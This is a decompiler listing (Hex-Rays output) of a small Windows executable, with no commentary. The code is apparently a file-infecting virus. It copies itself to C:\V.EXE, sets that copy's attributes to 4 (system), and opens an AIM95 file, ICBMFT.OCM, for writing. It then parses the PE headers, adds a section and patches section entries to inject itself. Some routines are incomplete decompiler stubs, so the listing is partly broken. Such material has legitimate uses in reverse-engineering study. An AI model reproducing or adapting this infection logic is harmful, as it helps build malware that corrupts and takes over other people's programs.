/* This file was generated by the Hex-Rays decompiler version 9.0.0.240925.
   Copyright (c) 2007-2021 Hex-Rays <info@hex-rays.com>

   Detected compiler: Visual C++
*/

#include <windows.h>
#include <defs.h>


//-------------------------------------------------------------------------
// Function declarations

void start();
// void __usercall __spoils<edx,ecx> sub_401136(int a1@<esi>);
// int __usercall sub_401347@<eax>(int a1@<ebx>, int a2@<edi>);
int sub_401358();
int sub_401363();
int sub_40136E();
int sub_401379();
int sub_401384();
int sub_40138F();
void sub_40139A();
void sub_4013AA();
// BOOL __stdcall CopyFileA(LPCSTR lpExistingFileName, LPCSTR lpNewFileName, BOOL bFailIfExists);
// HANDLE __stdcall CreateFileA(LPCSTR lpFileName, DWORD dwDesiredAccess, DWORD dwShareMode, LPSECURITY_ATTRIBUTES lpSecurityAttributes, DWORD dwCreationDisposition, DWORD dwFlagsAndAttributes, HANDLE hTemplateFile);
// void __stdcall __noreturn ExitProcess(UINT uExitCode);
// LPSTR __stdcall GetCommandLineA();
// DWORD __stdcall GetFileSize(HANDLE hFile, LPDWORD lpFileSizeHigh);
// HGLOBAL __stdcall GlobalAlloc(UINT uFlags, SIZE_T dwBytes);
// HGLOBAL __stdcall GlobalFree(HGLOBAL hMem);
// BOOL __stdcall ReadFile(HANDLE hFile, LPVOID lpBuffer, DWORD nNumberOfBytesToRead, LPDWORD lpNumberOfBytesRead, LPOVERLAPPED lpOverlapped);
// BOOL __stdcall SetFileAttributesA(LPCSTR lpFileName, DWORD dwFileAttributes);
// BOOL __stdcall CloseHandle(HANDLE hObject);

//-------------------------------------------------------------------------
// Data declarations

int dword_40135F = 0; // weak
int dword_40136A = 0; // weak
_UNKNOWN loc_401370; // weak
_UNKNOWN loc_40139C; // weak
CHAR FileName[] = "C:\\PROGRA~1\\AIM95\\ICBMFT.OCM"; // idb
CHAR ExistingFileName[260] =
{
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0'
}; // idb
HANDLE hObject = NULL; // idb
DWORD nNumberOfBytesToRead = 0u; // idb
DWORD NumberOfBytesWritten = 0u; // idb
LPCVOID lpBuffer = NULL; // idb
int dword_4021AA = 0; // weak
int dword_4021AE = 0; // weak
int dword_4021B2 = 0; // weak
int dword_4021B6 = 0; // weak
int dword_4021BA = 297869312; // weak
int dword_4021BE = 297869368; // weak


//----- (00401000) --------------------------------------------------------
void start()
{
  LPSTR v0; // esi
  CHAR *v1; // edi
  HANDLE FileA; // eax
  int v3; // eax
  char *v4; // esi
  _DWORD *v5; // esi
  int v6; // ecx

  v0 = GetCommandLineA() + 1;
  v1 = ExistingFileName;
  while ( *v0 != 34 )
    *v1++ = *v0++;
  *v1 = 0;
  CopyFileA(ExistingFileName, "C:\\V.EXE", 1);
  SetFileAttributesA("C:\\V.EXE", 4u);
  FileA = CreateFileA(FileName, 0xC0000000, 0, 0, 3u, 0, 0);
  if ( FileA == (HANDLE)-1 )
    JUMPOUT(0x40128F);
  hObject = FileA;
  nNumberOfBytesToRead = GetFileSize(FileA, 0);
  lpBuffer = GlobalAlloc(0x40u, nNumberOfBytesToRead + 0x2000);
  ReadFile(hObject, (LPVOID)lpBuffer, nNumberOfBytesToRead, &NumberOfBytesWritten, 0);
  if ( *(_WORD *)lpBuffer == 23117 )
  {
    dword_4021AA = *((_DWORD *)lpBuffer + 15);
    v3 = dword_4021AA - 60;
    v4 = (char *)lpBuffer + dword_4021AA;
    if ( *(_DWORD *)((char *)lpBuffer + dword_4021AA) == 17744 )
    {
      LOWORD(v3) = *((_WORD *)v4 + 3);
      dword_4021AE = v3;
      ++*((_WORD *)v4 + 3);
      dword_4021B6 = *((_DWORD *)v4 + 13);
      dword_4021B2 = *((_DWORD *)v4 + 20);
      *((_DWORD *)v4 + 20) += 4096;
      v5 = (char *)lpBuffer + dword_4021AA + 248;
      v6 = dword_4021AE;
      while ( 1 )
      {
        if ( *v5 == 1952539694 )
        {
          sub_401136((int)v5);
        }
        else if ( *v5 == 1835622702 )
        {
          break;
        }
        v5 += 10;
        if ( !--v6 )
          JUMPOUT(0x4011B2);
      }
    }
  }
  JUMPOUT(0x401279);
}
// 401053: control flows out of bounds to 40128F
// 4010AC: control flows out of bounds to 401279
// 401134: control flows out of bounds to 4011B2
// 401132: variable 'v6' is possibly undefined
// 4021AA: using guessed type int dword_4021AA;
// 4021AE: using guessed type int dword_4021AE;
// 4021B2: using guessed type int dword_4021B2;
// 4021B6: using guessed type int dword_4021B6;

//----- (00401136) --------------------------------------------------------
// write access to const memory has been detected, the output may be wrong!
void __usercall __spoils<edx,ecx> sub_401136(int a1@<esi>)
{
  int *v1; // esi
  int v2; // eax
  _DWORD *v3; // esi
  int *v4; // esi
  int v5; // eax
  char *v6; // esi
  int v7; // [esp-8h] [ebp-Ch]

  v1 = (int *)(a1 + 8);
  v7 = *v1;
  *v1 += 8;
  v2 = v1[3] + v7;
  v3 = (char *)lpBuffer + v2;
  *v3 = dword_4021BA;
  v3[1] = dword_4021BE;
  v4 = (int *)((char *)lpBuffer + 33940);
  if ( *((_BYTE *)lpBuffer + 33938) != 0xFF
    || (dword_40135F = *v4,
        v5 = dword_4021B6 + v2,
        *v4 = v5,
        v6 = (char *)lpBuffer + 34770,
        dword_40136A = *(_DWORD *)((char *)lpBuffer + 34770),
        *(_DWORD *)((char *)lpBuffer + 34770) = v5 + 4,
        *(v6 - 2) != -1) )
  {
    CloseHandle(hObject);
    GlobalFree((HGLOBAL)lpBuffer);
    ExitProcess(0);
  }
}
// 40117E: write access to const memory at 40135F has been detected
// 40119A: write access to const memory at 40136A has been detected
// 40135F: using guessed type int dword_40135F;
// 40136A: using guessed type int dword_40136A;
// 4021B6: using guessed type int dword_4021B6;
// 4021BA: using guessed type int dword_4021BA;
// 4021BE: using guessed type int dword_4021BE;

//----- (00401347) --------------------------------------------------------
int __usercall sub_401347@<eax>(int a1@<ebx>, int a2@<edi>)
{
  int (__stdcall **v2)(int, int, int); // eax

  ((void (*)(void))loc_40139C)();
  v2 = (int (__stdcall **)(int, int, int))((int (*)(void))loc_401370)();
  return (*v2)(a1, a2, 1);
}

//----- (00401358) --------------------------------------------------------
// positive sp value has been detected, the output may be wrong!
int sub_401358()
{
  int v1; // [esp-4h] [ebp-4h]

  return v1;
}
// 401359: positive sp value 4 has been found
// 401358: variable 'v1' is possibly undefined

//----- (00401363) --------------------------------------------------------
// positive sp value has been detected, the output may be wrong!
int sub_401363()
{
  int v1; // [esp-4h] [ebp-4h]

  return v1;
}
// 401364: positive sp value 4 has been found
// 401363: variable 'v1' is possibly undefined

//----- (0040136E) --------------------------------------------------------
// positive sp value has been detected, the output may be wrong!
int sub_40136E()
{
  int v1; // [esp-4h] [ebp-4h]

  return v1;
}
// 40136F: positive sp value 4 has been found
// 40136E: variable 'v1' is possibly undefined

//----- (00401379) --------------------------------------------------------
// positive sp value has been detected, the output may be wrong!
int sub_401379()
{
  int v1; // [esp-4h] [ebp-4h]

  return v1;
}
// 40137A: positive sp value 4 has been found
// 401379: variable 'v1' is possibly undefined

//----- (00401384) --------------------------------------------------------
// positive sp value has been detected, the output may be wrong!
int sub_401384()
{
  int v1; // [esp-4h] [ebp-4h]

  return v1;
}
// 401385: positive sp value 4 has been found
// 401384: variable 'v1' is possibly undefined

//----- (0040138F) --------------------------------------------------------
// positive sp value has been detected, the output may be wrong!
int sub_40138F()
{
  int v1; // [esp-4h] [ebp-4h]

  return v1;
}
// 401390: positive sp value 4 has been found
// 40138F: variable 'v1' is possibly undefined

//----- (0040139A) --------------------------------------------------------
// positive sp value has been detected, the output may be wrong!
void sub_40139A()
{
  ;
}
// 40139B: positive sp value 4 has been found

//----- (004013AA) --------------------------------------------------------
// positive sp value has been detected, the output may be wrong!
void sub_4013AA()
{
  ;
}
// 4013AB: positive sp value 4 has been found

// nfuncs=26 queued=11 decompiled=11 lumina nreq=0 worse=0 better=0
// ALL OK, 11 function(s) have been successfully decompiled
